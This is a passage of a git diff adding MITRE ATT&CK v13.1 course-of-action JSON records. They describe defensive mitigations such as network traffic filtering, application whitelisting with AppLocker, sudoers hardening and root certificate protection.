Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.867Z", + "name": "Network Share Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire network share information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20a2baeb-98c2-4901-bad7-dc62d0a03dea.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20a2baeb-98c2-4901-bad7-dc62d0a03dea.json new file mode 100644 index 0000000000000000000000000000000000000000..42545cb4dd6adf2e7d8d4bdd65dbd8b879d5e458 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20a2baeb-98c2-4901-bad7-dc62d0a03dea.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--d46b96b5-f39a-4bb1-bdb2-d96a2194e3ee", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--20a2baeb-98c2-4901-bad7-dc62d0a03dea", + "type": "course-of-action", + "created": "2019-06-06T21:21:13.027Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1029", + "url": "https://attack.mitre.org/mitigations/M1029" + } + ], + "modified": "2019-06-06T21:21:13.027Z", + "name": "Remote Data Storage", + "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d.json new file mode 100644 index 0000000000000000000000000000000000000000..e3e4b0721e5e45a608548fa9274b25fac57a7ff2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--e6a56f63-3a3e-4501-9fb5-12af9312e223", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d", + "type": "course-of-action", + "created": "2019-06-11T16:33:55.337Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1037", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "modified": "2020-06-20T20:46:36.342Z", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96.json new file mode 100644 index 0000000000000000000000000000000000000000..cfcc0f5377efe7560c83e9746e84062c7285c95f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--ef10963b-d281-4e80-9ce1-accf45c79391", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--21da4fd4-27ad-4e9c-b93d-0b9b14d02c96", + "type": "course-of-action", + "created": "2019-06-06T20:52:59.206Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1021", + "url": "https://attack.mitre.org/mitigations/M1021" + } + ], + "modified": "2019-06-06T20:52:59.206Z", + "name": "Restrict Web-Based Content", + "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c.json new file mode 100644 index 0000000000000000000000000000000000000000..96eb432a695c5ebc25f75d0e8e92d7bb1adfd186 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c.json @@ -0,0 +1,42 @@ +{ + "type": "bundle", + "id": "bundle--f08a5c33-9bc6-4254-8ffb-c392da8ce13a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--23061b40-a7b6-454f-8950-95d5ff80331c", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1130", + "url": "https://attack.mitre.org/mitigations/T1130", + "source_name": "mitre-attack" + }, + { + "source_name": "Wikipedia HPKP", + "description": "Wikipedia. (2017, February 28). HTTP Public Key Pinning. Retrieved March 31, 2017.", + "url": "https://en.wikipedia.org/wiki/HTTP_Public_Key_Pinning" + }, + { + "url": "https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec", + "description": "Graeber, M. (2017, December 22). Code Signing Certificate Cloning Attacks and Defenses. Retrieved April 3, 2018.", + "source_name": "SpectorOps Code Signing Dec 2017" + } + ], + "modified": "2020-03-31T12:49:14.885Z", + "name": "Install Root Certificate Mitigation", + "description": "HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate. (Citation: Wikipedia HPKP)\n\nWindows Group Policy can be used to manage root certificates and the Flags value of HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots can be set to 1 to prevent non-administrator users from making further root installations into their own HKCU certificate store. (Citation: SpectorOps Code Signing Dec 2017)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c.json new file mode 100644 index 0000000000000000000000000000000000000000..b05e96c6c47262f271f9a7055155b6232e3d9612 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--884e37b5-2d71-4463-9e3b-eee908d6cae7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--23bff3ce-021c-4e7a-9aee-60fd40bc7c6c", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1169", + "external_id": "T1169" + } + ], + "modified": "2019-07-25T12:03:12.876Z", + "name": "Sudo Mitigation", + "description": "The sudoers file should be strictly edited such that passwords are always required and that users can\u2019t spawn risky processes as users with higher privilege. By requiring a password, even if an adversary can get terminal access, they must know the password to run anything in the sudoers file.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec.json new file mode 100644 index 0000000000000000000000000000000000000000..0c7c88b9eacc732217f65baae6d098d185a08f24 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--c8efa55b-365b-425a-971f-32e632d5e77e", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--24478001-2eb3-4b06-a02e-96b3d61d27ec", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1079", + "external_id": "T1079" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "modified": "2019-07-25T11:15:39.400Z", + "name": "Multilayer Encryption Mitigation", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--245075bc-f992-4d89-af8c-834c53d403f4.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--245075bc-f992-4d89-af8c-834c53d403f4.json new file mode 100644 index 0000000000000000000000000000000000000000..9809dce9f189608675c1e14358bdaf3b47838762 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--245075bc-f992-4d89-af8c-834c53d403f4.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--a8b7925d-048c-471a-9c25-bb480b18ffd4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--245075bc-f992-4d89-af8c-834c53d403f4", + "type": "course-of-action", + "created": "2019-04-24T17:03:39.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1493", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1493" + } + ], + "modified": "2019-07-25T12:28:59.970Z", + "name": "Transmitted Data Manipulation Mitigation", + "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure communications related to those processes against tampering. Encrypt all important data flows to reduce the impact of tailored modifications on data in transit.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2497ac92-e751-4391-82c6-1b86e34d0294.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2497ac92-e751-4391-82c6-1b86e34d0294.json new file mode 100644 index 0000000000000000000000000000000000000000..92e38b0cc9e61fb7b779644938b859b1c3edc3ac --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2497ac92-e751-4391-82c6-1b86e34d0294.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--3fb0daee-3701-4895-aa61-8e0723f87617", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2497ac92-e751-4391-82c6-1b86e34d0294", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1020", + "url": "https://attack.mitre.org/mitigations/T1020", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:22.459Z", + "name": "Automated Exfiltration Mitigation", + "description": "Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b.json new file mode 100644 index 0000000000000000000000000000000000000000..6085d3a975d781016582e9b88a642fd1d292935c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--76e11ed1-aa3e-4078-8055-d322c3d52561", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1010", + "url": "https://attack.mitre.org/mitigations/T1010", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.664Z", + "name": "Application Window Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json new file mode 100644 index 0000000000000000000000000000000000000000..d8d64b67590d503d1b1cc2f8c08bb76d7c6b8c41 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--0c19d5f3-aa1d-4756-b827-4499d5310913", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1013", + "external_id": "M1013" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25e53928-6f33-49b7-baee-8180578286f6.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25e53928-6f33-49b7-baee-8180578286f6.json new file mode 100644 index 0000000000000000000000000000000000000000..45443745887d81218f1e0f54fec176917ff172be --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25e53928-6f33-49b7-baee-8180578286f6.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--185ac78f-77d8-4f72-8b44-72e378ac86b3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25e53928-6f33-49b7-baee-8180578286f6", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1019", + "external_id": "T1019" + }, + { + "source_name": "TCG Trusted Platform Module", + "description": "Trusted Computing Group. (2008, April 29). Trusted Platform Module (TPM) Summary. Retrieved June 8, 2016.", + "url": "http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" + } + ], + "modified": "2019-07-25T12:06:06.231Z", + "name": "System Firmware Mitigation", + "description": "Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--28adf6fd-ab6c-4553-9aa7-cef18a191f33.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--28adf6fd-ab6c-4553-9aa7-cef18a191f33.json new file mode 100644 index 0000000000000000000000000000000000000000..13f65bfb07187a1dc1c1bfae2bc99ee64a9800a2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--28adf6fd-ab6c-4553-9aa7-cef18a191f33.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--a56bff3e-091f-4662-8287-01f8656d02bf", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--28adf6fd-ab6c-4553-9aa7-cef18a191f33", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1002", + "url": "https://attack.mitre.org/mitigations/T1002", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.683Z", + "name": "Data Compressed Mitigation", + "description": "Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)\n\nIf network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2995bc22-2851-4345-ad19-4e7e295be264.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2995bc22-2851-4345-ad19-4e7e295be264.json new file mode 100644 index 0000000000000000000000000000000000000000..336216376aee460c72ae3d2862ff1e77b004bbd2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2995bc22-2851-4345-ad19-4e7e295be264.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--dbed4b1b-ad0c-4eba-b6f8-66053bb530ea", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2995bc22-2851-4345-ad19-4e7e295be264", + "type": "course-of-action", + "created": "2019-06-11T16:28:41.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1034", + "url": "https://attack.mitre.org/mitigations/M1034" + } + ], + "modified": "2020-06-09T20:48:12.326Z", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b.json new file mode 100644 index 0000000000000000000000000000000000000000..4e1d8765c6e19551343ffe7196bb003ac97af15b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--f62b461d-7b62-4e6a-beb7-912bdfd1a0b4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1022", + "url": "https://attack.mitre.org/mitigations/T1022", + "source_name": "mitre-attack" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "source_name": "Corio 2008" + }, + { + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "source_name": "TechNet Applocker vs SRP" + } + ], + "modified": "2021-08-23T20:25:19.310Z", + "name": "Data Encrypted Mitigation", + "description": "Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) 